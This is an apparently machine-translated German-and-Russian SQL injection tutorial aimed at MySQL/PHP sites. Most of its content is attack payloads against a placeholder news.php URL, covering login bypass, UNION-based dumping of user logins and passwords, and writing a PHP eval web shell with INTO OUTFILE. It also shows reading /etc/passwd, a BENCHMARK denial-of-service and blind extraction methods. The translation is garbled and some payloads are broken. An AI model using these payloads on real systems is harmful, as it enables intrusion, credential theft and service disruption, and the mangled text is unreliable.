Spezialthema

War Ukraine Russland

Hacking und Schutz ... die SQL - Injection ...

SQL Injection [vollständige FAQ]

0.INTRO

1. Wie SQL - Injection FINDEN

2. Was und wie kann aus diesen nützlichen gezogen werden

3. WAS IST, WENN KEINE Ausgabefelder ZU TUN.

4. WAS IST, WENN ETWAS Filter ZU TUN.

5. Nützliche Funktionen MYSQL

6. Wie gegen SQL - Injection zu schützen

7. ADDITIONS

0.INTRO

Laziv im Internet auf der Suche nach zumindest einige Informationen über SQL - Injection Sie müssen oft über Artikel gekommen sind oder sehr kurz oder nicht klar ist , entweder für ein einzelnes Thema oder irgendetwas anderes , das Sie sicherlich nicht gerecht wird . Wenn dann kratzte ich zusammen irgendwo auf dem Thema Artikel 10-20, die Feinheiten der vielen Schwachstellen zu erfassen. Und die Erinnerung an die Zeit, die ich beschlossen, eine komplette FAQ zu diesem Thema zu schreiben, also zu sagen, dass der Rest nicht besessen sind. Und noch eine Bitte. Diejenigen, die finden, dass ich etwas verpasst haben, irgendwo einen Fehler gemacht, und so wenden Sie sich bitte hier wieder abmelden, es ist schwierig, alle gleich, alle im Auge zu behalten

. Durch die Möglichkeit, dies mein erster Artikel, bitte nicht werfen Tomaten, und getreten.

Ich habe nicht von dem ersten Tag des Einbruchs Sie wahrscheinlich wissen , was eine SQL - Injection wenn nicht , dann ich ist der Artikel für Sie mitreißen. SQL Injektion ist die Injektion von einer weiteren Art von Angriff , bei dem der Angreifer die ursprüngliche Anforderung an die Datenbank modifiziert , so dass die Informationen , die er von der Datenbank benötigt abgeleitet wurde , wenn die Abfrage ausgeführt wird .

Für die Aufnahme dieses Artikels ist erforderlich:
a) Die Anwesenheit von Gehirn
b) Direkte Hände
in) SQL Sprachkenntnisse

Im Grunde war dieser Artikel für MYSQL + PHP geschrieben, aber es gibt ein paar Beispiele mit MSSQL.

Generell denke ich, dass der beste Weg , die korrekte Verwendung von SQL - Injection zu lernen , ist dieser Artikel nicht lesen, sondern eine lebendige Praxis, zum Beispiel eine anfällige Skript zu schreiben, oder meine am Ende gegeben verwenden.

Im Übrigen rate ich Ihnen , alles zu lesen , weil an jedem Punkt gibt es etwas Wichtiges für das nächste Element ist, usw.

1. Wie SQL-Injection FINDEN

Es ist ziemlich einfach. Es ist notwendig, in allen Bereichen, Variablen, Cookies, doppelte und einfache Anführungszeichen einzufügen.

1,1 Sekunden zuerst

Lassen Sie uns mit diesem Skript starten hier

1. Nehmen wir an, dass die ursprüngliche Anfrage an die Datenbank wie folgt aussieht:
SELECT * FROM news WHERE id=' 1 '; Jetzt anhängen wir Zitat in eine Variable "id", auf diese Weise - wenn die Variable nicht gefiltert wird, und enthalten Fehlermeldungen, die in etwa so kommen:

mysql_query (): Sie haben einen Fehler in der SQL - Syntax; Sie in der Bedienungsanleitung zu Ihrem MySQL entspricht Server - Version für den richtigen Syntax in der Nähe zu verwenden ' 1' '

Da die Anfrage an die Datenbank wird anwesend zusätzliche Angebot sein:
SELECT * FROM news WHERE id=' 1' '; Wenn die Fehlerberichterstattung wird in diesem Fall deaktiviert ist, können Sie das Vorhandensein von Schwachstellen wie die bestimmen (auch nicht aufhören es, das wäre nicht mit Ziffer 1.4 verwechselt werden, wie es im selben Absatz beschrieben ist.): Das ist eine Anforderung an die Datenbank wird wie folgt aus:
SELECT * FROM news WHERE id=' 1'; -- '; (Für diejenigen, die in den Tank sind "-" ein Zeichen für den Beginn des Kommentars nach allem wird sie verworfen, würde Ich mag Ihre Aufmerksamkeit auf die Tatsache lenken, dass, nachdem es immer ein Raum sein sollte (es in der Dokumentation für die MYSQL geschrieben wird) und die Art und Weise vor ihm auch). So für MYSQL Abfrage bleibt gleich und scheinen die gleichen wie bei http :? //xxx/news.php Id = 1
Tom, was für dieses Problem zu tun ist, um den gesamten Absatz 2 gewidmet.

1.2 Der zweite Fall

In SQL LIKE - Operator gibt. Es wird verwendet, Zeichenfolgen zu vergleichen. Hier nehmen wir das Skript Genehmigung, wenn der Benutzername und das Passwort-Datenbank Abfragen wie folgt eingeben:

SELECT * FROM users WHERE LIKE 'Admin' anmelden und übergeben LIKE '123';

Auch wenn das Skript filtert das Zitat, das er immer noch anfällig für Injektion bleibt. Wir brauchen statt eines Passworts einfach "%" eingeben (für den Operator LIKE "%" Zeichen steht eine beliebige Zeichenfolge) und dann die Anfrage

SELECT * FROM users WHERE LIKE 'Admin' Login und LIKE '%' übergeben;

und wir waren in den Login "Admin" erlaubt. In diesem Fall fanden wir nicht nur eine Injektion SQL , sondern auch verwendet , es erfolgreich.

1.3 Der dritte Fall

Was ist, wenn das gleiche Login-Skript Überprüfung ist nicht für Zitate. IMHO ist zumindest albern diesen Ausgang mit einer Injektion von Informationen, eine Art zu verwenden. Lassen Sie die Datenbank abfragen vom Typ zu sein:

SELECT * FROM users WHERE login = 'Admin' AND = '123' übergeben;

Leider ist Ihr Passwort '123' nicht geeignet

Aber lassen Sie uns sagen , dass wir eine Injektion in den Parameter "login" gefunden und das würde unter dem Namen "Admin" zu registrieren, müssen wir stattdessen so etwas wie dieses Admin 'schreiben; - Das ist ein Teil des Passwort - Authentifizierung abgelehnt wird und wir durch den Spitznamen 'Admin' gehen.

SELECT * FROM users WHERE login = ' Admin'; - 'AND pass =' 123 ';

Nun, was ist, wenn eine Sicherheitslücke in 'pass' Box zu tun. Wir passen auf diesem Gebiet folgende 123 'OR Login =' Admin '; -. Der Antrag wird sein:

SELECT * FROM users WHERE login = ' Admin' und übergeben = ' 123' oder Login = 'Admin'; - ';

Wie für die Datenbank wird indeintichno solcher Antrag vollständig sein:

SELECT * FROM users WHERE (login = "admin" und pass = '123') OR (login = 'Admin');

Nach diesen Schritten werden wir die volle Besitzer von Akka mit Login "Admin" werden.

1.4 Der vierte Fall

Lassen Sie uns an das Skript von Nachrichten zurück. Aus der SQL - Sprache müssen wir uns daran erinnern , dass die numerischen Parameter , die nicht in Anführungszeichen gesetzt werden , die an dieser Adresse , um das Skript http :? //xxx/news.php Id = 1 Abfrage an die Datenbank wie folgt aussieht:

SELECT * FROM Nachrichten WHERE id = 1;

Für diese kann eine Injektion auch in der Substitutions Parameter "id" angegeben werden und dann die gleiche Fehlermeldung herausspringen:

mysql_query (): Sie haben einen Fehler in der SQL - Syntax; Sie in der Bedienungsanleitung zu Ihrem MySQL entspricht Server - Version für den richtigen Syntax in der Nähe zu verwenden ' 1' '

Wenn diese Meldung nicht vyprigivaet nicht können wir verstehen , dass das Zitat gefiltert und dann müssen http eingeben: //xxx/news.php id = 1 bla-bla-bla?
DB versteht nicht, es für blah sho bla bla, und zeigt eine Meldung über die Art des Fehlers:

mysql_query (): Sie haben einen Fehler in der SQL - Syntax; Sie in der Bedienungsanleitung zu Ihrem MySQL entspricht Server - Version für den richtigen Syntax in der Nähe zu verwenden ' 1 bla-bla-bla'

Wenn Fehlermeldungen ausgeschaltet wird dann wie diese unter http: //xxx/news.php id = 1 ;? -
Sie sollten nur als http :? //xxx/news.php Id bekommen = 1

Jetzt können Sie mit Schritt 2 fortfahren.

2. Was und wie kann aus diesen nützlichen gezogen werden

Als nächstes werden nur die Art von Schwachstellen in Absatz berücksichtigt werden können 1.1 und der Rest verändern unter sich ist nicht schwer

2.1 Befehl UNION

Zunächst mit der nützlichsten ist das Team UNION (die nicht zu gehen in Google weiß) ...
Ändern Sie den Verweis auf das Skript http: //xxx/news.php id = 1 'UNION SELECT 1 - ?. Die Abfrage der Datenbank, die wir wie folgt erhalten:

SELECT * FROM Nachrichten WHERE id = '1' UNION SELECT 1 - ';

2.1.1.1 Die Auswahl der Anzahl von Feldern (Methode 1)

Vergessen Sie nicht über die Tatsache, dass die Anzahl der Spalten in die Union und nach erfüllen müssen sicherlich kommen Fehler wie folgt aus (es sei denn, die Tabelle nicht eine News-Spalte ist):

mysql_query (): Die verwendeten SELECT - Anweisungen haben eine unterschiedliche Anzahl von Spalten

In diesem Fall müssen wir kolichistvo Spalten (unabhängig von ihrer Anzahl zu UNION und nach sootvetsvovalo) zu holen. Wir tun es auf diese Weise:

http: //xxx/news.php id = 1 'UNION SELECT 1, 2 -
Fehler. «Die verwendeten SELECT - Anweisungen haben eine unterschiedliche Anzahl von Spalten»

http: //xxx/news.php id = 1 'UNION SELECT 1,2,3 -?
Auch der Fehler auf.
...

http: //xxx/news.php id = 1 'UNION SELECT 1,2,3,4,5,6 -?
Oh! Zeigen Sie die korrekte sowie http :? //xxx/news.php Id = 1
bedeutet, dass die Anzahl der Felder gewählt, dh ihre 6 Stück ...

2.1.1.2 Die Auswahl der Anzahl der Felder (Methode 2)

Und dieses Verfahren beruht auf der Auswahl der Anzahl der Felder GROUP BY verwenden. Das heißt, diese Art der Anfrage:

http: //xxx/news.php id = 1 'GROUP BY 2 -?

Es wird ohne Fehler angezeigt , wenn die Anzahl der Felder kleiner oder gleich 2 ist .
Wir tun diese Art der Anfrage:

http: //xxx/news.php id = 1 'GROUP BY 10 -?

Oops ... Es gab einen Fehler Typ.

mysql_query (): Unbekannte Spalte '10' in 'Gruppe Aussage'

So ist die Spalte ist kleiner als 10 Teilen 10 von 2. Und Antrag tun

http: //xxx/news.php id = 1 'GROUP BY 5 -?

Fehler Opa nicht bedeutet , dass die Anzahl der Spalten größer als oder gleich 5 , aber weniger als 10. Nehmen Sie nun den Mittelwert zwischen 5 und 10, es stellt sich heraus , wie ein 7. Erstellen einer Anfrage:

http: //xxx/news.php id = 1 'GROUP BY 7 -?

Oh Fehler wieder ...

mysql_query (): Unbekannte Spalte '7' in 'Gruppe Aussage'

So ist die Zahl größer als oder gleich 5 , aber weniger als 7. Nun, dann Antrag tun

http: //xxx/news.php id = 1 'GROUP BY 6 -?

Kein Fehler ... So ist die Zahl größer als oder gleich 6 ist, aber weniger als 7. Daraus folgt , dass die erforderliche Anzahl von Spalten 6.

2.1.1.3 Die Auswahl der Anzahl der Felder (Methode 3)

Das gleiche Prinzip wie in Ziffer 2.1.1.2 nur Funktion ORDER BY verwendet. Und etwas andere Fehlertext, wenn die Felder nicht mehr.

mysql_query (): Unbekannte Spalte '10' in 'bestellen Klausel "

2.1.2 Definition Ausgabespalten

Ich denke , dass viele von uns ist genau die Seite wie http :? //xxx/news.php Id = 1 nicht erfüllt ist. Also müssen wir machen , so dass die erste Suche nicht angezeigt werden (bis UNION). Am einfachsten ist es, die "id" mit einer "1" zu ändern, um "-1" (oder eine '9999999')
http :? //xxx/news.php id = -1 ' UNION SELECT 1,2,3,4,5,6 - Jetzt haben wir etwas , wo die Seite sollte in jeder dieser Figuren dargestellt werden. (Zum Beispiel, weil es bedingte Skript Nachrichten in der "Name der Nachricht" wird 3 sagen wir zeigen, "News", etc. Nun, -4). Nun kommen wir zu dem, was jemals Informationen benötigen wir diese Zahlen in obrschenii, um das Skript auf die benötigte Funktion zu ersetzen. Wenn die Zahlen nicht überall die übrigen Absätze des Absatzes angezeigt werden 2.1 kann übersprungen werden.

2.1.3 SIXSS (SQL - Injection - Cros - Site - Scripting )

Das exakt gleiche XSS nur durch eine Anfrage an die Datenbank. Beispiel:
http :? //xxx/news.php id = -1 ' UNION SELECT 1,2,3,' <script> alert ( 'SIXSS') </ script> ', 5,6 - Nun, ich denke nicht schwer zu verstehen , dass 4 Seite wird durch das <script> alert ( 'SIXSS "ersetzt ) </ script> und entsprechend genau die gleiche XSS erhalten.

2.1.4 Die Namen der Spalten / Tabellen

Wenn Sie den Namen und jede Spalte der Tabellen in der Datenbank kennen, können Sie diesen Artikel überspringen
Wenn Sie nicht wissen ... Es gibt zwei Möglichkeiten.

2.1.4.1 Die Namen der Spalten / Tabellen , wenn es Zugang zum INFORMATION_SCHEMA ist und wenn die Version von MYSQL> = 5

INFORMATION_SCHEMA.TABLES Tabelle enthält Informationen über alle Tabellen in der Datenbank, die Spalte TABLE_NAME-Tabellennamen.
http :? //xxx/news.php id = -1 ' UNION SELECT 1,2,3, TABLE_NAME, 5,6 FROM INFORMATION_SCHEMA.TABLES - Dies ist , wo Sie ein Problem sehen könnte. Da nur die erste Zeile der Datenbank Antwort angezeigt werden. Dann müssen wir LIMIT wie folgt zu verwenden:

Der Ausgang der ersten Zeile:
http: //xxx/news.php id = -1 'UNION SELECT 1,2,3, TABLE_NAME, 5,6 VON INFORMATION_SCHEMA.TABLES LIMIT 1,1 -?

Der Ausgang der zweiten Zeile:
? Http: //xxx/news.php id = -1 ' UNION SELECT 1,2,3, TABLE_NAME, 5,6 VON INFORMATION_SCHEMA.TABLES LIMIT 2,1 - usw.

Nun, wir fanden einen Tisch Benutzer. Nur diese ... ähem ... eine Spalte nicht wissen ... Dann kommen wir auf die Hilfe der Tabelle INFORMATION_SCHEMA.COLUMNS COLUMN_NAME Spalte enthält den Namen einer Spalte in der Tabelle TABLE_NAME. Das ist, wie wir die Spaltennamen extrahieren

http: //xxx/news.php id = -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' Benutzer 'LIMIT 1,1 -?

http: //xxx/news.php id = -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' Benutzer 'LIMIT 2,1 -?
usw.

Und hier haben wir das Feld Login, Passwort finden.

2.1.4.2 Die Namen der Spalten / Tabellen , wenn kein Zugriff auf die INFORMATION_SCHEMA ist

Diese Option zhopny

.tut TRITT gewöhnlichen brutofors eingeben ... Beispiel:

http: //xxx/news.php id = -1 'UNION SELECT 1,2,3,4,5,6 FROM tbl_name -?

Es ist notwendig , table_name aus , bis kein Fehler verschwinden wie:

mysql_query (): Table 'table_name' existiert nicht

Nun, wir haben das Glück Benutzer fehlende Fehlermeldung eingeführt, und die Seite wird angezeigt , als ob http :? //xxx/news.php Id = -1 ' UNION SELECT 1,2,3,4,5,6 - was es bedeutet , ? Dies bedeutet , dass die Tabelle suschestvet Benutzer und sollte auf die Sortierspalten verlaufen.

http: //xxx/news.php id = -1 'UNION SELECT 1,2,3, column_name, 5,6 von Benutzern -?

Es ist notwendig , column_name aus , bis kein Fehler verschwinden wie:

mysql_query (): Unbekannte Spalte 'column_name' 'in' field list '

Wo verschwindet Fehlermeldung bedeutet, dass es eine solche Spalte.

Und so haben wir gelernt , dass die Tabellenspalten Benutzer hat anmelden, Passwort.

2.1.5 Informationen anzeigen

Appell an das Skript so http :? //xxx/news.php Id = -1 ' UNION SELECT 1,2, Login, Passwort, 5,6 von Benutzern 1,1 LIMIT - zeigt uns die Login und Passwort des ersten Benutzers aus der Tabelle Benutzer.

2.2 Arbeiten mit Dateien

2.2.1 Schreiben in eine Datei

Es ist in so eine interessante MYSQL Funktion vom Typ SELECT ... INTO OUTFILE können Sie Informationen in einer Datei aufzuzeichnen. Entweder ist dieser Entwurf SELECT ... INTO DUMPFILE sie fast ähnlich sind , und Sie können jede verwenden.

Beispiel: http: //xxx/news.php id = -1 ' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE' 1.txt '; -

einige Einschränkungen für ihre Arbeit.

Verbot der Überschreiben von Dateien
Gewünscht Typ FILE Privilegien
(!) Durchaus vorhanden kyvychki in Angabe des Dateinamens

Aber was würde verhindern, dass uns die Bahn gehen zu machen? Hier ist ein Beispiel wie folgt aus:

http: //xxx/news.php id = -1 'UNION SELECT 1,2,3,' ', 5,6 INTO OUTFILE'? 1.php < ? php eval ($ _ GET [ 'e']) ??> '; -

Es bleibt nur noch den vollständigen Pfad zu der Wurzel einer Site auf dem Server zu finden, und fügen Sie 1.php. Vriprintsipe kann einen weiteren Fehler auf Grund des Berichts finden, die den Weg zu dem Server angezeigt wird oder das Root-Server und seine lokalen inkluda verlassen abholen, aber das ist ein anderes Thema.

2.2.2 Lesen von Dateien

Betrachten Sie LOAD_FILE Funktion

Beispiel: http: //xxx/news.php id = -1 ' UNION SELECT 1,2, LOAD_FILE (' etc / passwd '), 4,5,6 ;?

Für sie gibt es auch ein paar Einschränkungen.

Es muss einen vollständigen Pfad zu der Datei sein.
Gewünscht Typ FILE Privilegien
Die Datei muss sich auf demselben Server befinden
Die Größe dieser Datei sollte weniger als angegeben max_allowed_packet
Die Datei muss unter dem durch den Benutzer zum Lesen geöffnet werden wird MYSQL

Wenn die Funktion die Datei nicht lesen kann, wird NULL zurückgegeben.

2.3 DOS - Angriff auf dem SQL - Server

In den meisten Fällen dosyat SQL Server aufgrund der Tatsache, daß nichts anderes nicht tun kann. Typ konnte nicht gefunden Tabellen / Spalten, keine Rechte, um es, keine Rechte an ihm, usw. Ich ehrlich gegen diese Methode, aber immer noch ...

Auf den Punkt ...
BENCHMARK - Funktion führt die gleiche Aktion mehrmals.

SELECT BENCHMARK (100000, md5 (CURRENT_TIME));

Das heißt, diese Funktion 100.000 mal tut md5 (CURRENT_TIME) , dass mein Computer dauert etwa 0,7 Sekunden ... Es scheint , dass es so ist ... Und wenn Sie BENCHMARK angebracht versuchen?

SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (CURRENT_TIME)));

Es dauert eine lange Zeit, um ehrlich zu sein ich nicht einmal warten, ... hatte einen Reset zu tun

.
Beispiel Dosa in unserem Fall:

http: //xxx/news.php id = -1 'UNION SELECT 1, 2, BENCHMARK (100.000, BENCHMARK (100.000, md5 (CURRENT_TIME))), 4, 5, 6 ;? -

100 Poke F5 ist genug, um einfach "fallen in ungebremst Server down"))).

3. Was ist, wenn die NO Ausgabefelder zu tun.

3.1 Mit dem Charakter Büste

Dieser Fall wir brauchen , wenn http :? //xxx/news.php Id = 1 bei verschiedenen id uns unterschiedliche Ergebnisse liefern. Beispielsweise http :? //xxx/news.php Id = 1 verschieden ist von http :? //xxx/news.php Id = 0 , wenn nicht, dann ist diese Methode nutzlos , sondern bis zum Ende gelesen ist es wert.

Als wir die Anfrage an die Datenbank erinnern aussieht haben wir wie folgt aus

SELECT * FROM Nachrichten WHERE id = '1';

Jetzt ändern wir die verletzlich durch Paramtr id auf eine solche Anforderung (wenn etwas ungewohnt ist in Absatz 5 und lesen zu gehen):

SELECT * FROM Nachrichten WHERE id = ' -1' OR id = IF (ASCII ((SELECT USER ()))> = 254, '1', '0') - ';

So:

? Http: //xxx/news.php id = -1 ' OR id = IF (ASCII ((SELECT USER ()))> = 254,' 1 ',' 0 ') -

Was können wir für Sie tun? So starten Sie MYSQL führt eine Unterabfrage SELECT USER () fügt es in ASCII () Funktion, die den ASCII - Code des ersten Zeichens des Ergebnisses der Unterabfrage und der IF () gibt 1 zurück , wenn der Code größer oder gleich 100
osnovnoy Anfrage zu werden, so

SELECT * FROM Nachrichten WHERE id = '- 1' OR id = 1

und ausgeführt , um die gleiche Weise wie beim Zugriff auf das Skript http :? //xxx/news.php id = 1 und , wenn der Code für diese Anzahl kleiner ist als die Grundanforderung zu werden , so

SELECT * FROM Nachrichten WHERE id = '- 1' OR id = 0

und durchgeführt genauso gut wie in http: //xxx/news.php id = 0 Wir sagen , dass die bedingte Abfrage gibt 1 (ja) oder 0 (nein), bzw., und beginnen zu berühren ?.

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 100,' 1 ',' 0 ')
Ja ergab 1 bedeutet , dass das erste Zeichen ist größer als oder gleich 100 Versuchen Sie folgendes:

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 200,' 1 ',' 0 ')
Retour 0 bedeutet 100 <= Zeichencode <200.

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 150,' 1 ',' 0 ')
Auch hier ergab 0 bedeutet 100 <= Zeichencode <150.

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 125,' 1 ',' 0 ')
Und ich ergab 0 bedeutet 100 <= Zeichencode <125.

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 113,' 1 ',' 0 ')
Zurückgegangen 1 sledovatelno113 <= Zeichencode <125.

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 118,' 1 ',' 0 ')
Returns sledovatelno113 0 <= Zeichencode <118.

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 115,' 1 ',' 0 ')
113 <= Zeichen <code 115.

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1,1) = 113,' 1 ',' 0 ')
Zurückgegebene 0 bedeutet , der Zeichencode ist nicht gleich 113.

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1,1) = 114,' 1 ',' 0 ')
Hooray! Zurückgegangen 1 bedeutet , dass der Zeichencode 114 Wir sind auf ein Zeichen zu übersetzen und das Symbol "r" zu bekommen. Wir bewegen uns jetzt auf das nächste Zeichen auf.

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 2,1)> = 100,' 1 ',' 0 ')

Und wieder wiederholen wir alle die vorherigen Schritte.

3.2 Zeichen für Zeichen Brute - BENCHMARK mit

Was ist zu tun, wenn es keine Ausgabe des Feldes und aus der Fehlerberichterstattung ist? Um zu helfen, kommen wir BENCHMARK zu funktionieren. Wie oben beschrieben, führt diese Funktion eine einzelne Aktion mehrmals. Also, was Sie fragen ... Und das ist, was. Daran erinnern, dass der Antrag

SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (NOW ())));

sooo lange durchgeführt wird , und auf der Grundlage der Verzögerung (nein, keine Angst , nicht von den Verzögerungen , die jetzt gedacht sind) ein Zeichen beliebiger Parameter aussortieren wird , ist gültigen Benutzernamen , unter denen wir mit der Datenbank verbunden sind (es führt uns in die Funktion USER ()).

http :? //xxx/news.php id = -1 ' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1, 1)))> = 100, 1, BENCHMARK (2.999.999, MD5 (NOW ()))) -

Der Antrag wird sein:

SELECT * FROM Nachrichten WHERE id = ' -1' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1, 1)))> = 100, 1, BENCHMARK (2.999.999, MD5 (NOW ())) ) - ';

Und nun, analog zu dem vorhergehenden Absatz, werden wir die Zeichenfolge USER (sortieren). Nur in diesem Fall anstelle von 0, wird die Funktion eine sehr lange Zeit sein , um diese Anforderung zu erfüllen und dass wir reden über die Abfrage 0 zurück, bzw., und wenn ohne Verzögerung die Abfrage 1.

Nun lassen Sie uns über die Verzögerungszeit zu sprechen. Um die Zeit der Rückkehr 0 und 1 zu bestimmen , haben einige Voruntersuchungen zu tun:

http: //xxx/news.php id = -1 'OR id = WENN ( 99> 100, 1, BENCHMARK (2.999.999, MD5 (NOW ())) )?

0 zurück. Es ist notwendig, die Zeit zu messen. Je nach Bandbreite benötigen die Nummer 2999999 in dem Maße zu holen , die Sie genau , ob oder ob nicht beurteilen kann eine Verzögerung im Vergleich zu den dort war

http :? //xxx/news.php id = -1 ' OR id = WENN ( 101> 100, 1, BENCHMARK (2.999.999, MD5 (NOW ())) )

was gibt 1 zurück.

Der große Nachteil ist , dass BENCHMARK th wir sehr ein Server versenden.

ACHTUNG! In diesem Fall ist das Wichtigste ist , nicht , dass nach jeder Ausführung BENCHMARK-SQL - Server zu vergessen und müssen für eine Weile ruhen. (Ein wenig mehr tun , als BENCMARK Job selbst). Andernfalls können die Ergebnisse dieser erschöpfenden Suche falsch.

3.3 Mit dem Zeichensuche mit Hilfe der Fehlerberichterstattung

Dieser Artikel wurde geschrieben , bezogen auf (nur auf der Grundlage von nicht Reprints!) Artikel "Neue Benchmark'y Alternative oder effektive blinde SQL-Injection" Autor Elekt, Respekt es.

Diese Methode basiert auf der Tatsache , dass statt 0 zurückzugeben, die Unterabfrage den Fehler verursacht , und der Fehler kann geschlossen werden , dass der Richter ergab 0 und durch das Fehlen von Fehlern , die 1 zurückgeführt . Diese Methode wird uns helfen , wenn es keine Ausgabe des Feldes ist aber auch (!) Einen Fehlerbericht.

SELECT * FROM Nachrichten WHERE id = '- 1' OR id = (SELECT 1 UNION SELECT 2)

Glauben Sie, dass er diesen Antrag zurückkommen würde? Korrigieren Sie einen Fehler, da id mit der Unterabfrage verglichen wird, die zwei Zeilen zurückgibt.

mysql_query (): Subquery liefert mehr als 1 Zeile

Das war die Theorie. Jetzt gehen wir auf die Abfrage, mit der wir die Zeichen sortieren, wird

SELECT * FROM Nachrichten WHERE id = ' -1' OR id = WENN (ASCII (SUBSTRING ((SELECT USER ()), 1, 1)))> = 100, 1, (SELECT 1 UNION SELECT 2)) - " ;

Wie aus dieser Anforderung zu sehen , ob der Zeichencode größer als oder gleich 100 Funktion IF () gibt 1, und keine Fehler sind dann steigt und wenn die Funktion ausführt Unterabfrage

SELECT 1 UNION SELECT 2

die liefert die beiden Reihen , dass , wenn mit der ID im Vergleich ein Fehler ist , und wir erkennen , dass die Abfrage 0 zurückgibt.

Der große Nachteil dieses Verfahrens ist, dass die Protokolle große Anzahl von Fehlern gesammelt werden. Ein großes Plus ist die Geschwindigkeit.

3.4 Injektionen nach ORDER BY

Warum dann hatten viele den Eindruck, dass es ein hoffnungsloser Fall ist. Nun, was werden wir diese Stellungnahme im Gegenteil zu ändern. Lassen Sie DB-Abfrage wie folgt aussieht:

SELECT * FROM Nachrichten ORDER BY $ durch

Nun, wie immer von $ variable nicht passieren Filterung und Ausgabe mehrere Zeilen aus einer Datenbank. Nun, müssen wir zwei Anfragen erhalten, die auf der Seite irgendwie geschlossen würde sich ändern, fordert jedoch immer noch so sein sollte, dass Sie das Ergebnis Subqueries mittels lassen beeinflussen können. Als solche Anfragen können
http: //xxx/news.php durch = (id * 1)?
http: //xxx/news.php durch = (id * -1)?
Ich hoffe, dass Sie es in einer zweiten Zeit erraten die Probe "top-down" in Bezug auf die erste Anfrage, warum ist nicht schwer zu verstehen. Lassen Sie uns zum ersten Mal sagen gebracht, akzeptieren sie als Wahrheit:

Die ersten Nachrichten zweiten Nachrichten Dritte Nachrichten

Eine zweite Lüge:

Die dritte Nachricht zweiten Nachrichten Erste Nachrichten

Well Well Anfrage für Brutus Namen des aktuellen Benutzers wird wie folgt aussehen:
http: //xxx/news.php durch = (id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 112,1, -1))?
Naja , eigentlich ausgebrütet umgekehrter Reihenfolge news => false
http: //xxx/news.php durch = (id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 113,1, -1))?
Wieder eine Lüge
http: //xxx/news.php durch = (id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 114,1, -1))?
Oh! Direkt bestellen News => true
Übersetzen Zeichencode 114 in der r-Symbol. Gehen Sie zum nächsten Zeichen und so weiter.

4.Was TUN, WENN ETWAS Filter.

4.1 Gefiltert Lücke

Nun, zu Beginn mit erinnern wir uns , dass die SQL - Stil Design / ** / ist ein Raum. Und Sie können gehen 4.2 zu treten.

4.2 Gefiltert Zeichen / Zeile

Есть интересная функция которая возвращает по коду символа сам символ.Предположим фильтруется символ... ну пускай будет звездочка (*). Для начала нам нужно узнать код этого символа. В MYSQL есть функция ASCII() возвращает код самого левого символа из переданной ей строке юзается так

SELECT ASCII('*');

только на уязвимом хосте этого делать смысла нет (Символ '*' фильтруется) это нужно сделать на локалке. Узнаем что код равен 42 и юзаем функцию CHAR() так

SELECT CHAR(42, 42, 42);

Выведет три звездочки.Еще один способ это использовать 16-ричный код символа. Теперь предположим что фильтруется солово 'login'. В MYSQL есть функция HEX() которая выдает 16-ричный код строки. Юзается так

SELECT HEX('login');

Выдаст '6C6F67696E' впереди дописываем "0x" (Чтобы SQL понял что имеет дело с 16-ричной кодировкой) и получаем '0x6C6F67696E ' это юзать без CHAR() так

SELECT 0x6C6F67696E FROM User;

либо с так

SELECT CHAR(0x6C,0x6F,0x67,0x69,0x6E) FROM User;

5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL

Надеюсь что за SELECT, INSERT, UPDATE, DELETE, DROP вы знаете, если нет то лезем в эту книжку читать: google.com (Большой справочник языку SQL).

----------------------------
USER() -функция выводит логин юзера под которым мы подключены к MYSQL
DATABASE() -функция выводит название БД к которой мы подключены
VERSION() -выводит версию MYSQL
----------------------------
ASCII( str ) -возвращает ASCII код первого символа в строке "str"
CHAR( xx1,xx2,... ) -возвращает строку состоящую из сомволов ASCII коды которых xx1, xx2 и т.д.
HEX( str ) -возвращает 16-ричный эквивалент строки "str".
----------------------------
LENGTH( str ) - Возвращает длину строки "str".
SUBSTRING( str,pos[,len] ) -Возвращает подстроку длиной len(если не указан то до конца строки "str") символов из строки "str", начиная от позиции pos.
LOCATE( substr,str[,pos] ) -Возвращает позицию первого вхождения подстроки "substr" в строку "str" начиная с позиции pos(если не указанно то с начала строки "str"). Если подстрока "substr" в строке "str" отсутствует, возвращается 0.
----------------------------
LOWER( str ) -переводит в нижний регистр строку "str"(по-моему только латиницу)
CONCAT( param1,param2,... ) -объединение подстрок в одну строку.
CONCAT_WS( sep,param1,param2,... ) -объединение подстрок в одну строку c разделителем "sep".
----------------------------
IF( exp,ret1,ret2 ) -Проверяет условие exp если оно верно (не равно 0) то возвращает строку ret1 а если нет то возвращает строку ret2.
----------------------------
expr BETWEEN min AND max -Если величина выражения expr больше или равна заданному значению min и меньше или равна заданному значению max, то функция BETWEEN возвращает 1, в противном случае - 0.
----------------------------
AES_DECRYPT(AES_ENCRYPT( 'строка' , 'bla' ), 'bla' ) Часто бывают траблы с кодировкой и можно чтобы сильно не заморачиваться используют эту конструкцию.
----------------------------

Теперь о комментариях в Mysql
1) # символ начала комментария в MySQL. Beispiel:

SELECT pass,login FROM users #This is comment

